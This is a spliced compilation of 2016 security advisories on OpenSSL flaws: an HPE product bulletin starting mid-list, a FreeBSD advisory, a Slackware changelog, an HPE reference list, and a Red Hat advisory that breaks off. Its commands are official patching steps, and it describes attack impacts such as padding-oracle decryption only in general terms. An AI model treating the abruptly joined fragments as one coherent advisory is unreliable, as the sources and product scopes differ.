5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6125XLG - Version: R2422P02\n * HP Network Products\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 6127XLG - Version: R2422P02\n * HP Network Products\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + Moonshot - Version: R2432\n * HP Network Products\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5700 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5930 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 1950 (Comware 7) - Version: R3115\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7500 (Comware 7) - Version: R7184\n * HP Network Products\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5510HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130HI (Comware 7) - Version: R1120P10\n * HP Network Products\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5940 - Version: R2509\n * HP Network Products\n - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n - JH397A HPE FlexFabric 5940 2-slot Switch\n - JH398A HPE FlexFabric 5940 4-slot Switch\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5950 - Version: R6123\n * HP Network Products\n - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n - JH404A HPE FlexFabric 5950 4-slot Switch\n + 12900E (Comware 7) - Version: R2609\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**iMC Products**\n\n + iNode PC 7.2 (E0410) - Version: 7.2 E0410\n * HP Network Products\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n + iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409\n * HP Network Products\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n * CVEs\n - CVE-2016-2106\n - CVE-2016-2109\n - CVE-2016-2176\n\n\n**VCX Products**\n\n + VCX - Version: 9.8.19\n * HP Network Products\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 2 June 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-16:17.openssl Security Advisory\n The FreeBSD Project\n\nTopic: Multiple OpenSSL vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2016-05-04\nCredits: OpenSSL Project\nAffects: All supported versions of FreeBSD. \nCorrected: 2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE)\n 2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2)\n 2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16)\n 2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33)\n 2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE)\n 2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41)\nCVE Name: CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109,\n CVE-2016-2176\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nI. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. Problem Description\n\nThe padding check in AES-NI CBC MAC was rewritten to be in constant time\nby making sure that always the same bytes are read and compared against\neither the MAC or padding bytes. But it no longer checked that there was\nenough data to have both the MAC and padding bytes. [CVE-2016-2107]\n\nAn overflow can occur in the EVP_EncodeUpdate() function which is used for\nBase64 encoding of binary data. [CVE-2016-2105]\n\nAn overflow can occur in the EVP_EncryptUpdate() function, however it is\nbelieved that there can be no overflows in internal code due to this problem. \n[CVE-2016-2109]\n\nASN1 Strings that are over 1024 bytes can cause an overread in applications\nusing the X509_NAME_oneline() function on EBCDIC systems. [CVE-2016-2176]\nFreeBSD does not run on any EBCDIC systems and therefore is not affected. \n\nIII. Impact\n\nA MITM attacker can use a padding oracle attack to decrypt traffic\nwhen the connection uses an AES CBC cipher and the server support\nAES-NI. [CVE-2016-2107]\n\nIf an attacker is able to supply very large amounts of input data then a\nlength check can overflow resulting in a heap corruption. [CVE-2016-2105]\n\nAny application parsing untrusted data through d2i BIO functions are vulnerable\nto memory exhaustion attack. [CVE-2016-2109] TLS applications are not affected. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nRestart all daemons that use the library, or reboot the system. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nRestart all daemons that use the library, or reboot the system. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.x]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc\n# gpg --verify openssl-10.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc\n# fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all daemons that use the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/9/ r299053\nreleng/9.3/ r299068\nstable/10/ r298999\nreleng/10.1/ r299068\nreleng/10.2/ r299067\nreleng/10.3/ r299066\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://www.openssl.org/news/secadv/20160503.txt\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2105\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2106\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2109\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2176\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-16:17.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\n\niQIcBAEBCgAGBQJXKjuIAAoJEO1n7NZdz2rneZoP/jqsWr9q5MkCel2aZzfmSVhU\n8CjzPwm3t48ibZqrkolAak4dbjJGhidUM/S83BvIcCdtKWyoG8D0fzemB7bBIP2L\nfqvd1314vuy82CgZlAyJIqzokckUPfyHhTAz9FPZW46f8A+s8znzJcaaD81tt1Xe\nqg9JZ61e2DZJ2NdZSJSjOpBl55gZqQq3tIwGYw027GKjiflJSvOG1n/531R4rppI\nx0IZpLor7XBWuiC44hPc4yasC4khWzmdaRpqcUoWVEex8g6Il6xByS2o4AgX7kE/\nNBZ0mj4IMYZNQW4VUYbnkmLtWXJYYScboBKh4FRljNCG/t5u/YoSfOY8SbS9LT9K\nKVj56C6tQRq+/frKbPt26HbqqRTFNVn3FKxJWNQ9CLzsebobXPUYATTN2NVC8gkj\nS0A/lT2xnvA2YqB9HfmHOvlHS2LDv8SivJWNK4dCPOwhVm624H4qH/N+VFcwU7zc\nue+BPvDYU/czsyoJDdQoWxTdkreaOY6eLAWkYAh9dEDIkZSOxgsZR7C4th6THXMu\nybIy544elc3bf9vS4tGR552Wi9VntE0B1/LJ2la8l+MnYE6qZL1hbAYpvNyuPWVP\nEDPjOc4inaMpV62fuL1UrKH1g1HMmFUnoWhC70iS+cuLeXWFdvwBFyL420Ixkd5H\nzvcsfJCrazlcZ6j83Qfd\n=PGTh\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. \n This update fixes the following security issues:\n Memory corruption in the ASN.1 encoder (CVE-2016-2108)\n Padding oracle in AES-NI CBC MAC check (CVE-2016-2107)\n EVP_EncodeUpdate overflow (CVE-2016-2105)\n EVP_EncryptUpdate overflow (CVE-2016-2106)\n ASN.1 BIO excessive memory allocation (CVE-2016-2109)\n EBCDIC overread (CVE-2016-2176)\n For more information, see:\n https://www.openssl.org/news/secadv/20160503.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2108\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2105\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2106\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2109\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2176\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz\n9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ne5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz\n2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz\n59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz\nbf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz\n8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz\n\nSlackware x86_64 -current packages:\nb4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz\nbcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz \n\nThen, reboot the machine or restart any network services that use OpenSSL. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nReferences:\n\n - CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information\n - CVE-2016-2106 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2109 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2105 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-3739 - cURL and libcurl, Remote code execution\n - CVE-2016-5388 - \"HTTPoxy\", Apache Tomcat\n - CVE-2016-5387 - \"HTTPoxy\", Apache HTTP Server\n - CVE-2016-5385 - \"HTTPoxy\", PHP \n - CVE-2016-4543 - PHP, multiple impact\n - CVE-2016-4071 - PHP, multiple impact\n - CVE-2016-4072 - PHP, multiple impact\n - CVE-2016-4542 - PHP, multiple impact\n - CVE-2016-4541 - PHP, multiple impact\n - CVE-2016-4540 - PHP, multiple impact\n - CVE-2016-4539 - PHP, multiple impact\n - CVE-2016-4538 - PHP, multiple impact\n - CVE-2016-4537 - PHP, multiple impact\n - CVE-2016-4343 - PHP, multiple impact\n - CVE-2016-4342 - PHP, multiple impact\n - CVE-2016-4070 - PHP, Denial of Service (DoS)\n - CVE-2016-4393 - PSRT110263, XSS vulnerability\n - CVE-2016-4394 - PSRT110263, HSTS vulnerability\n - CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow\n - CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow\n - PSRT110145\n - PSRT110263\n - PSRT110115\n - PSRT110116\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release\nAdvisory ID: RHSA-2016:2957-01\nProduct: Red Hat JBoss Core Services\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-2957.html\nIssue date: 2016-12-15\nCVE Names: CVE-2012-1148 CVE-2014-3523 CVE-2014-8176 \n CVE-2015-0209 CVE-2015-0286 CVE-2015-3185 \n CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 \n CVE-2015-3216 CVE-2016-0702 CVE-2016-0705 \n CVE-2016-0797 CVE-2016-0799 CVE-2016-1762 \n CVE-2016-1833 CVE-2016-1834 CVE-2016-1835 \n CVE-2016-1836 CVE-2016-1837 CVE-2016-1838 \n CVE-2016-1839 CVE-2016-1840 CVE-2016-2105 \n CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 \n CVE-2016-2109 CVE-2016-2177 CVE-2016-2178 \n CVE-2016-2842 CVE-2016-3627 CVE-2016-3705 \n CVE-2016-4447 CVE-2016-4448 CVE-2016-4449 \n CVE-2016-4459 CVE-2016-4483 CVE-2016-5419 \n CVE-2016-5420 CVE-2016-6808 CVE-2016-7141 \n CVE-2016-8612 \n=====================================================================\n\n1. Summary:\n\nRed Hat JBoss Core Services httpd 2.4.23 is now available from the Red Hat\nCustomer Portal for Solaris and Microsoft Windows systems. \n\nRed Hat Product Security has rated this release as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. \n\nSecurity Fix(es):\n\n* This update fixes several flaws in OpenSSL. (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. (CVE-2012-1148)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106,\nCVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nand CVE-2016-2842. The CVE-2016-4459 issue was discovered by Robert Bost\n(Red Hat). Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n801648 - CVE-2012-1148 expat: Memory leak in poolGrow\n1121519 